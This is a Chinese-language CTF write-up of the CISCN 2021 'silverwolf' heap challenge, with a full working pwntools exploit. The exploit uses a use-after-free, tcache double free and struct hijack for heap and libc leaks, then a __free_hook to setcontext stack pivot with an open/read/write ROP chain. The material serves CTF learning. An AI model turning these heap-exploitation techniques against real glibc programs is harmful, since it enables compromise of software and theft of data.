[CISCN 2021 初赛]silverwolf ---- 堆上的ORW#

尝试复现一些大赛的题目，主要是感觉一点长进都没有，一直刷题不知道学了些什么…

这题主要是堆上的ORW,跟着gets的博客来的

废话不多说，开始，pwninit一下

1
❯ pwninit pwn
2
[INFO] 当前已在虚拟环境中: ctf
3
[INFO] 给二进制文件添加执行权限...
4
[SUCCESS] 权限添加成功: pwn
5
[INFO] 检查二进制文件保护:
6
==================================
7
[*] '/mnt/d/TY/网安笔记/CTF_PWN/复现/CISCN_2021_初赛_silverwolf/pwn'
8
    Arch:       amd64-64-little
9
    RELRO:      Full RELRO
10
    Stack:      Canary found
11
    NX:         NX enabled
12
    PIE:        PIE enabled
13
    FORTIFY:    Enabled
14
==================================
15
[INFO] 生成exp.py模板...
16
[SUCCESS] exp.py生成成功
17
[SUCCESS] 初始化完成！

可以看到保护全开，稍微运行了一下，基本的菜单题，拖ida看看

程序#

main#

我将函数稍微重命名了一下，

1
void __fastcall __noreturn main(__int64 a1, char **a2, char **a3)
2
{
3
  __int64 v3[5]; // [rsp+0h] [rbp-28h] BYREF
4

5
  v3[1] = __readfsqword(0x28u);
6
  init_();
7
  while ( 1 )
8
  {
9
    puts("1. allocate");
10
    puts("2. edit");
11
    puts("3. show");
12
    puts("4. delete");
13
    puts("5. exit");
14
    __printf_chk(1LL, "Your choice: ");
15
    __isoc99_scanf(&unk_1144, v3);
16
    switch ( v3[0] )
17
    {
18
      case 1LL:
19
        add();                                  // malloc chunk_size <= 0x78
20
        break;
21
      case 2LL:
22
        edit();
23
        break;
24
      case 3LL:
25
        show();
26
        break;
27
      case 4LL:
28
        delete();                               // UAF
29
        break;
30
      case 5LL:
31
        exit(0);
32
      default:
33
        puts("Unknown");
34
        break;
35
    }
36
  }
37
}

init_#

存在沙盒

1
__int64 init_()
2
{
3
  __int64 v0; // rbx
4

5
  setvbuf(stdin, 0LL, 2, 0LL);
6
  setvbuf(stdout, 0LL, 2, 0LL);
7
  setvbuf(stderr, 0LL, 2, 0LL);
8
  v0 = seccomp_init(0LL);
9
  seccomp_rule_add(v0, 2147418112LL, 0LL, 0LL);
10
  seccomp_rule_add(v0, 2147418112LL, 2LL, 0LL);
11
  seccomp_rule_add(v0, 2147418112LL, 1LL, 0LL);
12
  return seccomp_load(v0);
13
}

1
//seccomp-tools dump ./pwn   只给了read open write，很明显打堆上的ORW
2
❯ seccomp-tools dump ./pwn
3
 line  CODE  JT   JF      K
4
=================================
5
 0000: 0x20 0x00 0x00 0x00000004  A = arch
6
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
7
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
8
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
9
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
10
 0005: 0x15 0x02 0x00 0x00000000  if (A == read) goto 0008
11
 0006: 0x15 0x01 0x00 0x00000001  if (A == write) goto 0008
12
 0007: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0009
13
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
14
 0009: 0x06 0x00 0x00 0x00000000  return KILL

add#

这里是存在一些问题的，可以看到，程序在输入index之后会有一个**!size**的判断（反编译结果里index和size复用了同一个栈变量），所以index一定得为0，也就是说，后面申请的chunk的指针会把前面申请的chunk的指针覆盖掉，同时限制malloc的chunk大小得小于等于0x78

1
unsigned __int64 add()
2
{
3
  size_t chunk_size; // rbx
4
  void *ptr; // rax
5
  size_t size; // [rsp+0h] [rbp-18h] BYREF
6
  unsigned __int64 v4; // [rsp+8h] [rbp-10h]
7

8
  v4 = __readfsqword(0x28u);
9
  __printf_chk(1LL, "Index: ");
10
  __isoc99_scanf((__int64)&unk_1144, (__int64)&size);
11
  if ( !size )
12
  {
13
    __printf_chk(1LL, "Size: ");
14
    __isoc99_scanf((__int64)&unk_1144, (__int64)&size);
15
    chunk_size = size;
16
    if ( size > 0x78 )
17
    {
18
      __printf_chk(1LL, "Too large");
19
    }
20
    else
21
    {
22
      ptr = malloc(size);
23
      if ( ptr )
24
      {
25
        size_list = chunk_size;
26
        heap_list = ptr;
27
        puts("Done!");
28
      }
29
      else
30
      {
31
        puts("allocate failed");
32
      }
33
    }
34
  }
35
  return __readfsqword(0x28u) ^ v4;
36
}

edit#

同时edit也是同样的，有一个判断，v3得为0，也就是只能修改heap_list当前保存的那个chunk（即最近一次申请到的chunk），并且允许我们往chunk里面写入内容：最多写入size_list个字节，遇到换行符则提前结束，并把换行符替换成\0

1
unsigned __int64 edit()
2
{
3
  _BYTE *v0; // rbx
4
  char *v1; // rbp
5
  __int64 v3; // [rsp+0h] [rbp-28h] BYREF
6
  unsigned __int64 v4; // [rsp+8h] [rbp-20h]
7

8
  v4 = __readfsqword(0x28u);
9
  __printf_chk(1LL, "Index: ");
10
  __isoc99_scanf((__int64)&unk_1144, (__int64)&v3);
11
  if ( !v3 )
12
  {
13
    if ( heap_list )
14
    {
15
      __printf_chk(1LL, "Content: ");
16
      v0 = heap_list;
17
      if ( size_list )
18
      {
19
        v1 = (char *)heap_list + size_list;
20
        while ( 1 )
21
        {
22
          read(0, v0, 1uLL);
23
          if ( *v0 == 10 )
24
            break;
25
          if ( ++v0 == v1 )
26
            return __readfsqword(0x28u) ^ v4;
27
        }
28
        *v0 = 0;
29
      }
30
    }
31
  }
32
  return __readfsqword(0x28u) ^ v4;
33
}

show#

很正常的打印

1
unsigned __int64 show()
2
{
3
  __int64 v1; // [rsp+0h] [rbp-18h] BYREF
4
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]
5

6
  v2 = __readfsqword(0x28u);
7
  __printf_chk(1LL, "Index: ");
8
  __isoc99_scanf((__int64)&unk_1144, (__int64)&v1);
9
  if ( !v1 && heap_list )
10
    __printf_chk(1LL, "Content: %s\n", (const char *)heap_list);
11
  return __readfsqword(0x28u) ^ v2;
12
}

delete#

存在很明显的UAF漏洞：free之后没有把heap_list置空，所以之后仍然可以对这个指针进行edit、show，甚至再次free，

1
unsigned __int64 delete()
2
{
3
  __int64 v1; // [rsp+0h] [rbp-18h] BYREF
4
  unsigned __int64 v2; // [rsp+8h] [rbp-10h]
5

6
  v2 = __readfsqword(0x28u);
7
  __printf_chk(1LL, "Index: ");
8
  __isoc99_scanf((__int64)&unk_1144, (__int64)&v1);
9
  if ( !v1 && heap_list )
10
    free(heap_list);
11
  return __readfsqword(0x28u) ^ v2;
12
}

分析#

目前已知有UAF漏洞，并且题目是Glibc2.27的，所以存在tcache bin，并且需要打ORW，其实在这之前我并没有打过堆上的ORW，现在进行尝试，首先我们肯定需要泄漏libc地址，而一般是利用unsorted bin的chunk，因为ub的fd和bk都是指向main_arena+一个偏移的地址，但是现在只能申请小于等于0x78大小的chunk，那么现在的问题就是怎么得到一个不属于fastbin范围的chunk，而我们是处于Glibc2.27的环境下，而tcache bin会申请一个很大的chunk，用于管理tcache bin里面的chunk，这个大的chunk在Glibc2.27里size字段是0x251（即大小0x250加上PREV_INUSE标志位），而由于开启了沙盒，导致会有很多杂乱的chunk，如图

那么现在如果我们能够把这个chunk free掉，不就可以使得它进ub，从而得到libc_addr嘛？因此我们现在需要得到这个chunk的地址，那么怎么得到呢？本题使用的Glibc2.27已经针对tcache bin引入了key这个用于检测double free的机制（该机制最早出现在2.29，后来被移植回了较新的2.27补丁版本），当一个chunk被free掉，进入tcache bin的时候，会把tcache管理结构的地址（是一个堆地址）作为key写入到chunk用户区+8的位置，因此，利用这个机制，我们可以泄漏得到heap_addr,

leak_heap_addr#

那么好，现在先来处理泄漏heap_addr的问题，那么现在的问题是：这个key会检测double free,如果不能double free，那么我们目前无法将free掉的这个tcache chunk的fd修改为处于头部的0x251的chunk,那么就无法通过ub泄漏地址，所以我们需要把这个key覆盖掉，随便覆盖成什么，因为地址后面第二次free的时候会重新覆盖上，那么好，来看变化：

1
def exp():
2
    for i in range(7):
3
        add(0x78)
4
        edit(b'source')
5
    edit(b'a'*0x10)
6
    delete()
7
    edit(b'a'*0x10)
8
    bug()
9
exp()
10
itr()

这里是存在问题的，这里直接show是得不到这个地址的，因为key前面的8个字节（fd）是0，__printf_chk的%s遇到\0就被截断掉了，所以必须double free，让fd指向chunk自身，这样show出来的就是一个堆地址

好了，现在我们就可以double free,并且泄漏地址了，

拿到地址，为了简洁，将代码修改成这样，并且将泄漏的地址的低三位十六进制数（也就是低12位）清零，这样得到堆的基地址

1
# ========== Exploit 开始 ==========
2
def exp():
3
    for i in range(7):
4
        add(0x78)
5
        edit(b'source')
6
    for i in range(2):
7
        edit(b'a'*0x10)
8
        delete()
9
    show()
10
    ru("Content: ")
11
    heap_addr = uu64(ru(b'\x0a',drop=True))&0xffffffffff000
12
    leak("heap_addr",heap_addr)
13
    bug()
14
exp()
15
itr()

修改fd为tcache的大chunk#

因为已经double free，并且存在UAF，我们可以把这个chunk的fd修改为heap_addr+0x10，也就是tcache管理结构（那个0x251的大chunk）的用户区地址，这样连续申请两次0x78之后，第二次就会拿到这个大chunk，进而让我们能够拿到libc的地址，

1
    edit(p64(heap_addr+0x10))
2
    add(0x78)
3
    add(0x78)

修改这个chunk，并且free，泄漏libc#

现在这里需要将tcache bin的机制来复习学习

tcache bin其实是依靠最开始申请的这个大的chunk来控制的，前面一部分是count部分，就是用来管理chunk的数量的，也就是tcache_perthread_struct里面的counts部分，其实tcache_put和tcache_get就是围绕这个counts来记录tcachebin里面chunk数量的，free的时候会根据它来判断对应的bin是否已经放满，如果说我们把这个覆盖成7，那么再次释放对应大小的chunk就不会进入tcachebin，直接进入unsorted bin或者fastbin，其中每个counts所占字节大小其实不是固定的，会随着版本的变化而变化，最好的解决办法是看源码，或者，直接调试，那么接下来是调试的办法，这里是另一个题目的，不是这道题的，只是举一个例子

所以在那道例题的环境里counts的大小就是两个字节；而本题的Glibc2.27中每个counts只占一个字节，所以下面的EXP里只用一个\x07字节去覆盖

这样就是对应的距离了，

好了，既然了解了这部分counts的知识，现在我们是在这个0x251的chunk上，那么现在找到0x250这个大小对应的counts的位置（下标为(0x250-0x20)/0x10=0x23），并且将对应的部分覆盖为7，并且free掉这个chunk使其进入ub，从而泄漏地址

1
    edit(b'\x00'*0x23+b'\x07')
2
    delete()
3
    show()
4
    libc_base = l64()-0x3ebca0
5
    leak("libc_base",libc_base)

这里的libc_base可以直接硬编码计算（0x3ebca0就是main_arena+96在这个libc里的偏移），也可以使用其他方法，比如减去main_arena的偏移再减去96（main_arena通常没有导出符号，可以用libc.sym.__malloc_hook+0x10得到它的偏移）

接下来就要考虑ORW了#

因为开启了沙箱，很明显，只想让我们打ORW,

1
❯ seccomp-tools dump ./pwn
2
 line  CODE  JT   JF      K
3
=================================
4
 0000: 0x20 0x00 0x00 0x00000004  A = arch
5
 0001: 0x15 0x00 0x07 0xc000003e  if (A != ARCH_X86_64) goto 0009
6
 0002: 0x20 0x00 0x00 0x00000000  A = sys_number
7
 0003: 0x35 0x00 0x01 0x40000000  if (A < 0x40000000) goto 0005
8
 0004: 0x15 0x00 0x04 0xffffffff  if (A != 0xffffffff) goto 0009
9
 0005: 0x15 0x02 0x00 0x00000000  if (A == read) goto 0008
10
 0006: 0x15 0x01 0x00 0x00000001  if (A == write) goto 0008
11
 0007: 0x15 0x00 0x01 0x00000002  if (A != open) goto 0009
12
 0008: 0x06 0x00 0x00 0x7fff0000  return ALLOW
13
 0009: 0x06 0x00 0x00 0x00000000  return KILL

首先让我们回想一下在栈上打ORW的时候是什么样子的，要么构造ROP，要么写shellcode,而在堆上是没有办法直接在堆内存上执行代码的，现在就要引申一个概念，就是栈迁移是为了什么，栈迁移是不是实际上就是通过rbp去控制rsp，这样就把rsp迁移到任意位置，这样的话栈也就被迁移到其他地方了,接下来只要这个地方存在ROP，就可以直接执行，因为ROP的gadget在text段上，可以直接执行，那么这是在栈上，一般也会迁移到.bss段上，但是在堆上呢？应该怎么做？

而在Glibc中有这么一个函数，setcontext，而这个函数又以2.27,2.29为分界，在这里不详细说明，下面是这个函数在2.27的样子，

主要注意这部分，可以看到是使用rdi来控制所有通用寄存器的值，但是这里不重要，重要的是，这里会把[rdi+0xa0]处保存的值赋给rsp，rsp是栈顶指针，也就是rsp往下，都会被认为是栈，这样的话不就可以控制rsp去执行ROP-----ORW了嘛，那么我们现在需要考虑怎么布置这个伪造的栈帧了，其实如果想执行到这里，那么我们也许需要借助hook函数，

首先这里是通过rdi来控制的，所以rdi一定得是堆上的某个地址，因为我们需要在堆上执行ORW,

那么我们应该怎么布置这些呢？,如下，

1
   pay = b'\x02'*0x40+p64(libc_base+libc.sym.__free_hook)+p64(0)
2
    pay += p64(heap_addr+0x1000)    # flag_addr heap:0x40
3
    pay += p64(heap_addr+0x2000)    # fake_chunk heap:0x50
4
    pay += p64(heap_addr+0x20a0)    # stack 2 heap:0x60
5
    pay += p64(heap_addr+0x3000)    # orw1 heap:0x70
6
    pay += p64(heap_addr+0x3060)    # orw2 heap:0x80 continue orw1

现在的我们还处于tcache bin 的这个巨大的结构体堆里面，这个时候我们还是可以通过这个结构体来布置chunk的，首先把前面的counts填一下，随便填一点，然后就是free_hook,从这里开始是tcache bin里面每一个chunk队列的头的地址对应的chunk的地址，也就是tcache_entry->*next，~~我在说什么呢？~~,其实就是chunk队列的头，链接的chunk，就比如：0x20：chunk1—>chunk2，这里我所讲的就是chunk1

那么按照这样布置，就会使得对应size的chunk地址为我们所布置的，

1
0x20-->free_hook；0x30用不上，所以随意覆盖；
2
0x40-->heap_addr+0x1000；0x50-->heap_addr+0x2000；
3
0x60-->heap_addr+0x20a0；0x70 -->heap_addr+0x3000 ;
4
0x80 -->heap_addr+0x3060

那么现在，只要申请对应size大小就可以控制对应的内存了，至于这里的chunk的地址为什么是这样的，我一个一个的解释，

还记得上面说过的，需要把rsp控制到堆上吗？而在Glibc2.27里面setcontext是使用rdi去控制的（注：2.29貌似是rdx控制的），所以我们需要控制rdi，而free_hook在释放chunk的时候，rdi里面的值刚好会是你free的那个堆块的地址，那么这样不就可以把rdi控制为我们指定的chunk的地址吗？接下来0x40~0x80这几个chunk的作用，也许你们就知道是什么了：其中0x70和0x80是为了布置ORW读取flag的fake_stack，因为ROP链太长了，一个chunk的空间不够，所以需要两个相邻的chunk来拼接；然后0x40的chunk是为了存放"/flag"这个路径字符串，也可以把flag的内容读在上面（不过下面的完整EXP里实际是把flag内容读到了heap_addr+0x3000处），

注意接下来的操作：首先把tcache bin里面的0x20的chunk申请出来（也就是free_hook），并且修改为setcontext+53的位置（因为setcontext+53的位置是mov rsp,[rdi+0xa0]），这样下次执行free的时候就会直接跳到setcontext+53的位置，从而将rsp移动到对应的位置，那么这里是第一步，接下来我们需要干啥呢？第二步，我们需要构造一下，我们需要在0x60这个chunk（heap_base+0x20a0）的内容上放上heap_base+0x3000也就是ORW的地址，那么现在，我们如果把0x50那个chunk释放掉，就会使得rdi == chunk_size_0x50 ~~表意写法，不要在意~~，并且同时触发setcontext，将rdi+0xa0地方的内容给rsp，这里rdi+0xa0的地方其实就是heap_base+0x2000+0xa0 ====> heap_base+0x20a0，那么这个地方的值是什么呢？那不就是我们前面的heap_base+0x3000吗？那么不就把rsp放到orw上来了吗？这样就可以在执行完setcontext之后执行ORW了，但是需要注意的是在修改0x60这个chunk的内容为heap_base+0x3000的时候，后面还需要加一个ret，因为setcontext里面会把[rdi+0xa8]处的值取出来push到新栈上，最后的ret会先跳到这个地址，所以这里要放一个ret gadget来平衡，之后才会继续从heap_base+0x3000开始执行ROP，

并且在构造ORW的时候，需要注意open要使用syscall的方式构造，不可以直接调用libc的open函数：一方面2.27里open()内部实际走的是openat系统调用（257号），不在沙盒的白名单内，直接调用会被KILL；另一方面open函数开始的位置会影响栈布局，具体如下:

而read和write就不会

完整EXP#

1
#!/usr/bin/env python3
2
from pwn import *
3
from LibcSearcher import *
4

5
# 配置
6
context(os='linux', arch='amd64', log_level='debug')
7
binary = "./pwn"
8

9
# 远程/本地切换
10
if args.get("REMOTE"):
11
    io = remote("node4.anna.nssctf.cn",28172)
12
else:
13
    io = process(binary)
14

15
# ELF加载
16
elf = ELF(binary)
17
libc = ELF("./libc-2.27.so")
18

19
# ========== 常用函数定义 ==========
20
s       = lambda data               : io.send(data)
21
sa      = lambda delim, data        : io.sendafter(str(delim), data)
22
sl      = lambda data               : io.sendline(data)
23
sla     = lambda delim, data        : io.sendlineafter(str(delim), data)
24
r       = lambda num=4096           : io.recv(num)
25
rl      = lambda                    : io.recvline()
26
ru      = lambda delims, drop=False : io.recvuntil(delims, drop)
27
itr     = lambda                    : io.interactive()
28
uu32    = lambda data               : u32(data.ljust(4, b'\x00'))
29
uu64    = lambda data               : u64(data.ljust(8, b'\x00'))
30
leak    = lambda name, addr         : log.success('{} ======== > {:#x}'.format(name, addr))
31
p       = lambda name,data          : print("{} ======== > {}".format(name,data))
32

33
# ========== 常用泄露函数 ==========
34
l64     = lambda                    : u64(io.recvuntil(b"\x7f")[-6:].ljust(8, b"\x00"))
35
l32     = lambda                    : u32(io.recvuntil(b"\xf7")[-4:].ljust(4, b"\x00"))
36
l64_no  = lambda                    : u64(io.recv(6).ljust(8, b'\x00'))
37
def bug():
38
  gdb.attach(io)
39
  pause()
40
# [+] ========= Some funtion ========= [+]
41
def add(size):
42
    sla("Your choice:",str(1))
43
    sla("Index:",str(0))
44
    sla("Size:",str(size))
45

46
def edit(content):
47
    sla("Your choice:",str(2))
48
    sla("Index:",str(0))
49
    sla("Content:",content)
50

51
def delete():
52
    sla("Your choice:",str(4))
53
    sla("Index:",str(0))
54

55
def show():
56
    sla("Your choice:",str(3))
57
    sla("Index:",str(0))
58

59
# ========== Exploit 开始 ==========
60
def exp():
61
    for i in range(7):
62
        add(0x78)
63
        edit(b'source')
64
    for i in range(2):
65
        edit(b'a'*0x10)
66
        delete()
67
    show()
68
    ru("Content: ")
69
    heap_addr = uu64(ru(b'\x0a',drop=True))&0xffffffffff000
70
    leak("heap_addr",heap_addr)
71
    edit(p64(heap_addr+0x10))
72
    add(0x78)
73
    add(0x78)
74

75
    edit(b'\x00'*0x23+b'\x07')
76
    delete()
77
    show()
78

79
    libc_base = l64()-0x3ebca0
80
    leak("libc_base",libc_base)
81
    bug()
82
    # [+] ========= change stuck from tcache ========= [+]
83
    pay = b'\x02'*0x40+p64(libc_base+libc.sym.__free_hook)+p64(0)
84
    pay += p64(heap_addr+0x1000)    # flag_addr heap:0x40
85
    pay += p64(heap_addr+0x2000)    # fake_chunk heap:0x50
86
    pay += p64(heap_addr+0x20a0)    # stack 2 heap:0x60
87
    pay += p64(heap_addr+0x3000)    # orw1 heap:0x70
88
    pay += p64(heap_addr+0x3060)    # orw2 heap:0x80 continue orw1
89
    edit(pay)
90

91
    # [+] ====== Some addr ======= [+]
92
    rax = libc_base+0x000000000001b500
93
    rdi = libc_base+0x000000000002164f
94
    rsi = libc_base+0x0000000000023a6a
95
    rdx = libc_base+0x0000000000001b96
96
    ret = libc_base+0x00000000000008aa
97
    syscall = libc_base+libc.sym.read+15
98
    leave_ret = libc_base+0x00000000000547e3
99

100
    setcontext = libc_base+libc.sym.setcontext+53
101
    read = libc_base+libc.sym.read
102
    write = libc_base+libc.sym.write
103
    flag = heap_addr+0x1000
104
    get_flag = heap_addr+0x3000
105

106
    # [+] ====== O R W ========== [+]
107
    o = p64(rdi)+p64(flag)
108
    o += p64(rsi)+p64(0)
109
    o += p64(rax)+p64(2)
110
    o += p64(syscall)
111

112
    r = p64(rdi)+p64(3)
113
    r += p64(rsi)+p64(get_flag)
114
    r += p64(rdx)+p64(0x100)
115
    r += p64(read)
116

117
    w = p64(rdi)+p64(1)
118
    w += p64(write)
119

120
    orw = o+r+w
121

122
    leak("setcontext",setcontext)
123
    add(0x18)
124
    edit(p64(setcontext))
125

126
    add(0x38)
127
    edit(b'/flag')
128

129
    add(0x68)
130
    edit(orw[:0x60])    # orw1
131
    add(0x78)
132
    edit(orw[0x60:])    # orw2
133

134
    add(0x58)
135
    edit(p64(heap_addr+0x3000)+p64(ret))
136
    add(0x48)
137
    #gdb.attach(io)
138
    delete()
139
    #pause()
140
    #bug()
141
exp()
142
itr()